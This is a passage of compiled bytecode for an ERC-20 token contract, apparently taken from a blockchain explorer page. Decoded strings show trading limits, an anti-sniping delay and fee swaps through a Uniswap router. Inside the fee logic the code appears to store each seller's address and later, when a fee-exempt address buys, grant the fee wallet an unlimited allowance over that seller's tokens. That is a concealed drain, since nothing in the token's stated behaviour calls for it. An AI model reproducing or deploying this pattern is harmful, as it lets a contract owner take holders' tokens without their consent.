000000000000000000000000000815260040161201390613b9b565b60405180910390fd5b43600b60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b5b601360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680156121055750601260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b156121ac5760075481111561214f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161214690613c2d565b60405180910390fd5b60095461215b83610cab565b8261216691906134b0565b11156121a7576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161219e90613cbf565b60405180910390fd5b61234a565b601360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16801561224f5750601260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b1561229e57600754811115612299576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161229090613d51565b60405180910390fd5b612349565b601260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16612348576009546122fb83610cab565b8261230691906134b0565b1115612347576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161233e90613de3565b60405180910390fd5b5b5b5b5b5b600061235730610cab565b90506000600854821015905080801561237c5750600a60029054906101000a900460ff165b80156123955750600660149054906101000a900460ff16155b80156123eb5750601360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b80156124415750601160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b80156124975750601160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b156124db576001600660146101000a81548160ff0219169083151502179055506124bf612c2e565b6000600660146101000a81548160ff0219169083151502179055505b6000600660149054906101000a900460ff16159050601160008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16806125915750601160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b1561263f5760009050601360008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161561263e5761263d600c60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16600d60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff166000196119c7565b5b5b600080479050821561283257601360008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680156126b8575060006126b682600f54612ce790919063ffffffff16565b115b156126ec576126e560646126d7600f5489612cfd90919063ffffffff16565b612d1390919063ffffffff16565b915061280e565b601360008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161561280d576127666064612758600e5489612cfd90919063ffffffff16565b612d1390919063ffffffff16565b915087600c60006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550601060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16600d60006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505b5b6000821115612823576128228830846129af565b5b818661282f9190613e03565b95505b61283d8888886129af565b50505050505b505050565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b80601360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508015158273ffffffffffffffffffffffffffffffffffffffff167fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab60405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603612a1e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612a1590613ea9565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603612a8d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612a8490613f3b565b60405180910390fd5b612a98838383612d29565b60008060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015612b1e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612b1590613fcd565b60405180910390fd5b8181036000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254612bb191906134b0565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051612c1591906131e7565b60405180910390a3612c28848484612d2e565b50505050565b6000612c3930610cab565b905060008103612c495750612ce5565b6014600854612c589190613fed565b811115612c71576014600854612c6e9190613fed565b90505b612c7a81612d33565b601060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166108fc479081150290604051600060405180830381858888f19350505050158015612ce2573d6000803e3d6000fd5b50505b565b60008183612cf59190613e03565b905092915050565b60008183612d0b9190613fed565b905092915050565b60008183612d21919061405e565b905092915050565b505050565b505050565b6000600267ffffffffffffffff811115612d5057612d4f61408f565b5b604051908082528060200260200182016040528015612d7e5781602001602082028036833780820191505090505b5090503081600081518110612d9657612d956140be565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250507f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015612e3b573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190612e5f9190613565565b81600181518110612e7357612e726140be565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050612ed8307f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d846119c7565b7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663791ac9478360008430426040518663ffffffff1660e01b8152600401612f3a9594939291906141ab565b600060405180830381600087803b158015612f5457600080fd5b505af1158015612f68573d6000803e3d6000fd5b505050505050565b600081519050919050565b600082825260208201905092915050565b60005b83811015612faa578082015181840152602081019050612f8f565b60008484015250505050565b6000601f19601f8301169050919050565b6000612fd282612f70565b612fdc8185612f7b565b9350612fec818560208601612f8c565b612ff581612fb6565b840191505092915050565b6000602082019050818103600083015261301a8184612fc7565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600061305282613027565b9050919050565b61306281613047565b811461306d57600080fd5b50565b60008135905061307f81613059565b92915050565b6000819050919050565b61309881613085565b81146130a357600080fd5b50565b6000813590506130b58161308f565b92915050565b600080604083850312156130d2576130d1613022565b5b60006130e085828601613070565b92505060206130f1858286016130a6565b9150509250929050565b60008115159050919050565b613110816130fb565b82525050565b600060208201905061312b6000830184613107565b92915050565b60006020828403121561314757613146613022565b5b600061315584828501613070565b91505092915050565b6000819050919050565b600061318361317e61317984613027565b61315e565b613027565b9050919050565b600061319582613168565b9050919050565b60006131a78261318a565b9050919050565b6131b78161319c565b82525050565b60006020820190506131d260008301846131ae565b92915050565b6131e181613085565b82525050565b60006020820190506131fc60008301846131d8565b92915050565b60008060006060848603121561321b5761321a613022565b5b600061322986828701613070565b935050602061323a86828701613070565b925050604061324b868287016130a6565b9150509250925092565b61325e81613047565b82525050565b60006020820190506132796000830184613255565b92915050565b600060ff82169050919050565b6132958161327f565b82525050565b60006020820190506132b0600083018461328c565b92915050565b6132bf816130fb565b81146132ca57600080fd5b50565b6000813590506132dc816132b6565b92915050565b600080604083850312156132f9576132f8613022565b5b600061330785828601613070565b9250506020613318858286016132cd565b9150509250929050565b60006020828403121561333857613337613022565b5b6000613346848285016132cd565b91505092915050565b6000806040838503121561336657613365613022565b5b600061337485828601613070565b925050602061338585828601613070565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806133d657607f821691505b6020821081036133e9576133e861338f565b5b50919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206160008201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b600061344b602883612f7b565b9150613456826133ef565b604082019050919050565b6000602082019050818103600083015261347a8161343e565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006134bb82613085565b91506134c683613085565b92508282019050808211156134de576134dd613481565b5b92915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b600061351a602083612f7b565b9150613525826134e4565b602082019050919050565b600060208201905081810360008301526135498161350d565b9050919050565b60008151905061355f81613059565b92915050565b60006020828403121561357b5761357a613022565b5b600061358984828501613550565b91505092915050565b60006040820190506135a76000830185613255565b6135b46020830184613255565b9392505050565b6000819050919050565b60006135e06135db6135d6846135bb565b61315e565b613085565b9050919050565b6135f0816135c5565b82525050565b600060c08201905061360b6000830189613255565b61361860208301886131d8565b61362560408301876135e7565b61363260608301866135e7565b61363f6080830185613255565b61364c60a08301846131d8565b979650505050505050565b6000815190506136668161308f565b92915050565b60008060006060848603121561368557613684613022565b5b600061369386828701613657565b93505060206136a486828701613657565b92505060406136b586828701613657565b9150509250925092565b7f596f7520646f206e6f742068617665207065726d697373696f6e20746f20636860008201527f616e67652074686520726f757465722070616972000000000000000000000000602082015250565b600061371b603483612f7b565b9150613726826136bf565b604082019050919050565b6000602082019050818103600083015261374a8161370e565b9050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b60006137ad602583612f7b565b91506137b882613751565b604082019050919050565b600060208201905081810360008301526137dc816137a0565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b600061383f602683612f7b565b915061384a826137e3565b604082019050919050565b6000602082019050818103600083015261386e81613832565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006138d1602483612f7b565b91506138dc82613875565b604082019050919050565b60006020820190508181036000830152613900816138c4565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000613963602283612f7b565b915061396e82613907565b604082019050919050565b6000602082019050818103600083015261399281613956565b9050919050565b7f45524332303a207472616e736665722066726f6d20646561642061646472657360008201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b60006139f5602183612f7b565b9150613a0082613999565b604082019050919050565b60006020820190508181036000830152613a24816139e8565b9050919050565b7f45524332303a207472616e7366657220746f2064656164206164647265737300600082015250565b6000613a61601f83612f7b565b9150613a6c82613a2b565b602082019050919050565b60006020820190508181036000830152613a9081613a54565b9050919050565b7f54726164696e67206e6f7420796574206163746976617465642e000000000000600082015250565b6000613acd601a83612f7b565b9150613ad882613a97565b602082019050919050565b60006020820190508181036000830152613afc81613ac0565b9050919050565b7f5472616e736665722064656c617920697320656e61626c656420746f2070726560008201527f76656e7420736e6970696e672e20204f6e6c79206f6e6520707572636861736560208201527f2070657220626c6f636b20697320616c6c6f7765642e00000000000000000000604082015250565b6000613b85605683612f7b565b9150613b9082613b03565b606082019050919050565b60006020820190508181036000830152613bb481613b78565b9050919050565b7f427579207472616e7366657220616d6f756e742065786365656473207468652060008201527f6d6178696d756d20666f72206f6e65207472616e73616374696f6e2e00000000602082015250565b6000613c17603c83612f7b565b9150613c2282613bbb565b604082019050919050565b60006020820190508181036000830152613c4681613c0a565b9050919050565b7f427579207472616e7366657220616d6f756e742065786365656473207468652060008201527f6d6178696d756d20666f72206f6e652077616c6c657400000000000000000000602082015250565b6000613ca9603683612f7b565b9150613cb482613c4d565b604082019050919050565b60006020820190508181036000830152613cd881613c9c565b9050919050565b7f53656c6c207472616e7366657220616d6f756e7420657863656564732074686560008201527f206d6178696d756d20666f72206f6e65207472616e73616374696f6e2e000000602082015250565b6000613d3b603d83612f7b565b9150613d4682613cdf565b604082019050919050565b60006020820190508181036000830152613d6a81613d2e565b9050919050565b7f53656c6c207472616e7366657220616d6f756e7420657863656564732074686560008201527f206d6178696d756d20666f72206f6e652077616c6c6574000000000000000000602082015250565b6000613dcd603783612f7b565b9150613dd882613d71565b604082019050919050565b60006020820190508181036000830152613dfc81613dc0565b9050919050565b6000613e0e82613085565b9150613e1983613085565b9250828203905081811115613e3157613e30613481565b5b92915050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000613e93602583612f7b565b9150613e9e82613e37565b604082019050919050565b60006020820190508181036000830152613ec281613e86565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000613f25602383612f7b565b9150613f3082613ec9565b604082019050919050565b60006020820190508181036000830152613f5481613f18565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000613fb7602683612f7b565b9150613fc282613f5b565b604082019050919050565b60006020820190508181036000830152613fe681613faa565b9050919050565b6000613ff882613085565b915061400383613085565b925082820261401181613085565b9150828204841483151761402857614027613481565b5b5092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b600061406982613085565b915061407483613085565b9250826140845761408361402f565b5b828204905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b600081519050919050565b600082825260208201905092915050565b6000819050602082019050919050565b61412281613047565b82525050565b60006141348383614119565b60208301905092915050565b6000602082019050919050565b6000614158826140ed565b61416281856140f8565b935061416d83614109565b8060005b8381101561419e5781516141858882614128565b975061419083614140565b925050600181019050614171565b5085935050505092915050565b600060a0820190506141c060008301886131d8565b6141cd60208301876135e7565b81810360408301526141df818661414d565b90506141ee6060830185613255565b6141fb60808301846131d8565b969550505050505056fea26469706673582212205c6993511c31cc52d41e59a91bb671e1e581e8b19c048cb9eae7222bbc32fcbe64736f6c63430008110033

Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.